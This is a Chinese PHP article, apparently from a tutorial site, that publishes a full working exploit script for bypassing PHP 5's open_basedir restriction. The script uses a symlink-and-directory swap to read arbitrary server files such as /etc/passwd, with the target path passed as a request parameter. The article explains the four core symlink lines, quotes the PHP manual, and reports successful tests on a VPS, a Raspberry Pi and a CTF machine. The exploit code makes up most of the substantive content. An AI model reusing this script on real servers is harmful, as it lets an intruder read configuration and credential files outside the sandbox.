编程 PHP

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

Posted in PHP onJanuary 20, 2015

漏洞很久之前（大概5年前）被提出来了，但并不是php代码上的问题，所以问题一直存在，直到现在。我一直没留意，后来yaseng告诉我的，他测试了好像5.5都可以。

漏洞详情在这里 http://cxsecurity.com/issue/WLB-2009110068。

给出我写的EXP：

<?php

/*

* by phithon

* From https://3water.com

* detail: http://cxsecurity.com/issue/WLB-2009110068

*/

header('content-type: text/plain');

error_reporting(-1);

ini_set('display_errors', TRUE);

printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());

printf("disable_functions: %s\n", ini_get('disable_functions'));

$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');

$relat_file = getRelativePath(__FILE__, $file);

$paths = explode('/', $file);

$name = mt_rand() % 999;

$exp = getRandStr();

mkdir($name);

chdir($name);

for($i = 1 ; $i < count($paths) - 1 ; $i++){

  mkdir($paths[$i]);

  chdir($paths[$i]);

}

mkdir($paths[$i]);

for ($i -= 1; $i > 0; $i--) { 

  chdir('..');

}

$paths = explode('/', $relat_file);

$j = 0;

for ($i = 0; $paths[$i] == '..'; $i++) { 

  mkdir($name);

  chdir($name);

  $j++;

}

for ($i = 0; $i <= $j; $i++) { 

  chdir('..');

}

$tmp = array_fill(0, $j + 1, $name);

symlink(implode('/', $tmp), 'tmplink');

$tmp = array_fill(0, $j, '..');

symlink('tmplink/' . implode('/', $tmp) . $file, $exp);

unlink('tmplink');

mkdir('tmplink');

delfile($name);

$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";

$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";

echo "\n-----------------content---------------\n\n";

echo file_get_contents($exp);

delfile('tmplink');
function getRelativePath($from, $to) {

  // some compatibility fixes for Windows paths

  $from = rtrim($from, '\/') . '/';

  $from = str_replace('\\', '/', $from);

  $to   = str_replace('\\', '/', $to);
  $from   = explode('/', $from);

  $to     = explode('/', $to);

  $relPath  = $to;
  foreach($from as $depth => $dir) {

    // find first non-matching dir

    if($dir === $to[$depth]) {

      // ignore this directory

      array_shift($relPath);

    } else {

      // get number of remaining dirs to $from

      $remaining = count($from) - $depth;

      if($remaining > 1) {

        // add traversals up to first matching dir

        $padLength = (count($relPath) + $remaining - 1) * -1;

        $relPath = array_pad($relPath, $padLength, '..');

        break;

      } else {

        $relPath[0] = './' . $relPath[0];

      }

    }

  }

  return implode('/', $relPath);

}
function delfile($deldir){

  if (@is_file($deldir)) {

    @chmod($deldir,0777);

    return @unlink($deldir);

  }else if(@is_dir($deldir)){

    if(($mydir = @opendir($deldir)) == NULL) return false;

    while(false !== ($file = @readdir($mydir)))

    {

      $name = File_Str($deldir.'/'.$file);

      if(($file!='.') && ($file!='..')){delfile($name);}

    } 

    @closedir($mydir);

    @chmod($deldir,0777);

    return @rmdir($deldir) ? true : false;

  }

}
function File_Str($string)

{

  return str_replace('//','/',str_replace('\\','/',$string));

}
function getRandStr($length = 6) {

  $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

  $randStr = '';

  for ($i = 0; $i < $length; $i++) {

    $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);

  }

  return $randStr;

}

如我们欲读取/etc/passwd。其实原理就是创建一个链接文件x，用相对路径指向a/a/a/a，再创建一个链接文件exp指向x/../../../etc/passwd。

其实指向的就是a/a/a/a/../../../etc/passwd，其实就是./etc/passwd。

这时候删除x，再创建一个x目录，但exp还是指向x/../../../etc/passwd，所以就成功跨到/etc/passwd了。

精华就是这四句：

symlink("abc/abc/abc/abc","tmplink"); 

symlink("tmplink/../../../etc/passwd", "exploit"); 

unlink("tmplink"); 

mkdir("tmplink");

我们访问http://xxx/exp，如果服务器支持链接文件的访问，那么就能读到/etc/passwd。

其中并没有任何操作触发open_basedir，但达到的效果就是绕过了open_basedir读取任意文件。

错误不在php，但又不知道把错误归结到谁头上，所以php一直未管这个问题。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

open_basedir

将 PHP 所能打开的文件限制在指定的目录树，包括文件本身。本指令不受安全模式打开或者关闭的影响。

当一个脚本试图用例如 fopen() 或者 gzopen() 打开一个文件时，该文件的位置将被检查。当文件在指定的目录树之外时 PHP 将拒绝打开它。所有的符号连接都会被解析，所以不可能通过符号连接来避开此限制。

特殊值 . 指明脚本的工作目录将被作为基准目录。但这有些危险，因为脚本的工作目录可以轻易被 chdir() 而改变。

在 httpd.conf 文件中中，open_basedir 可以像其它任何配置选项一样用“php_admin_value open_basedir none”的方法关闭（例如某些虚拟主机中）。

在 Windows 中，用分号分隔目录。在任何其它系统中用冒号分隔目录。作为 Apache 模块时，父目录中的 open_basedir 路径自动被继承。

用 open_basedir 指定的限制实际上是前缀，不是目录名。也就是说“open_basedir = /dir/incl”也会允许访问“/dir/include”和“/dir/incls”，如果它们存在的话。如果要将访问限制在仅为指定的目录，用斜线结束路径名。例如：“open_basedir = /dir/incl/”。

Note:

支持多个目录是 3.0.7 加入的。

默认是允许打开所有文件。

我在我的VPS（php5.3.28 + nginx）和树莓派（php 5.4.4 + nginx）上都测试过，成功读取。

树莓派测试：

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

相比于5.3 XML那个洞（那个很多文件读不了），这个成功率还是比较稳的，很多文件都能读。而且版本没要求，危害比较大。

前几天成信的CTF，试了下这个脚本，apache也可以读取，当时读了读kali机子的/etc/httpd/conf/httpd.conf，没啥收获。

发现没旁站，流量是通过网关转发的。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

- Author -

junjie

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php expects parameter 1 to be resource, array given 错误

Mar 23 PHP

调整优化您的LAMP应用程序的5种简单方法

Jun 26 PHP

第七章 php自定义函数实现代码

Dec 30 PHP

php操作MongoDB基础教程（连接、新增、修改、删除、查询）

Mar 25 PHP

PHP获取客户端真实IP地址的5种情况分析和实现代码

Jul 08 PHP

PHP错误Allowed memory size of 67108864 bytes exhausted的3种解决办法

Jul 28 PHP

浅谈PHP解析URL函数parse_url和parse_str

Nov 11 PHP

php字符串替换函数substr_replace()用法实例

Mar 17 PHP

php编程每天必学之验证码

Mar 03 PHP

laravel学习教程之存取器

Jul 30 PHP

Yii2框架实现利用mpdf创建pdf文件功能示例

Feb 08 PHP

PHP htmlspecialchars_decode()函数用法讲解

Mar 01 PHP

php中解析带中文字符的url函数分享

Jan 20 #PHP

PHP中使用正则表达式提取中文实现笔记

Jan 20 #PHP

php中的观察者模式简单实例

Jan 20 #PHP

php 5.6版本中编写一个PHP扩展的简单示例

Jan 20 #PHP

PHP函数extension_loaded()用法实例

Jan 19 #PHP

php使用正则表达式获取图片url的方法

Jan 16 #PHP

php使用CURL伪造IP和来源实例详解

Jan 15 #PHP

You might like

使用PHP和XSL stylesheets转换XML文档

2006/10/09 PHP

thinkphp3.x中变量的获取和过滤方法详解

2016/05/20 PHP

PHP获取指定日期是星期几的实现方法

2016/11/30 PHP

Laravel 中使用 Vue.js 实现基于 Ajax 的表单提交错误验证操作

2017/06/30 PHP

javascript实现面向对象类的功能书写技巧

2010/03/07 Javascript

分享10篇优秀的jQuery幻灯片制作教程及应用案例

2011/04/16 Javascript

js获取指定日期周数以及星期几的小例子

2014/06/27 Javascript

使用JavaScript+canvas实现图片裁剪

2015/01/30 Javascript

jquery实现仿JqueryUi可拖动的DIV实例

2015/07/31 Javascript

AngularJS 基础ng-class-even指令用法

2016/08/01 Javascript

Angular表单验证实例详解

2016/10/20 Javascript

微信小程序城市选择及搜索功能的方法

2019/03/22 Javascript

「中高级前端面试」JavaScript手写代码无敌秘籍（推荐）

2019/04/08 Javascript

layui--select使用以及下拉框实现键盘选择的例子

2019/09/24 Javascript

原生javascript中this几种常见用法总结

2020/02/24 Javascript

javascript设计模式 ? 适配器模式原理与应用实例分析

2020/04/13 Javascript

如何通过Proxy实现JSBridge模块化封装

2020/10/22 Javascript

Python使用cookielib模块操作cookie的实例教程

2016/07/12 Python

Python制作词云的方法

2018/01/03 Python

python pandas库中DataFrame对行和列的操作实例讲解

2018/06/09 Python

python 对txt中每行内容进行批量替换的方法

2018/07/11 Python

[原创]Python入门教程3. 列表基本操作【定义、运算、常用函数】

2018/10/30 Python

python实现猜数游戏

2020/03/27 Python

中国一家专注拼团的社交购物网站：拼多多

2018/06/13 全球购物

印度排名第一的蛋糕、鲜花和礼品送货：Winni

2019/08/02 全球购物

什么是View State？

2013/01/27 面试题

大学生职业生涯规划书模板

2014/01/03 职场文书

大学生新学期计划书

2014/04/28 职场文书

2014统计局民主生活会对照检查材料思想汇报

2014/10/02 职场文书

医德医风个人总结

2015/02/28 职场文书

教师个人自我评价

2015/03/04 职场文书

团队执行力培训心得体会

2015/08/15 职场文书

Python中json.dumps()函数的使用解析

2021/05/17 Python

pytorch 中nn.Dropout的使用说明

2021/05/20 Python

python基于turtle绘制几何图形

2021/06/15 Python

「玫瑰之王的葬礼」舞台剧主视觉图公开

2022/03/21 日漫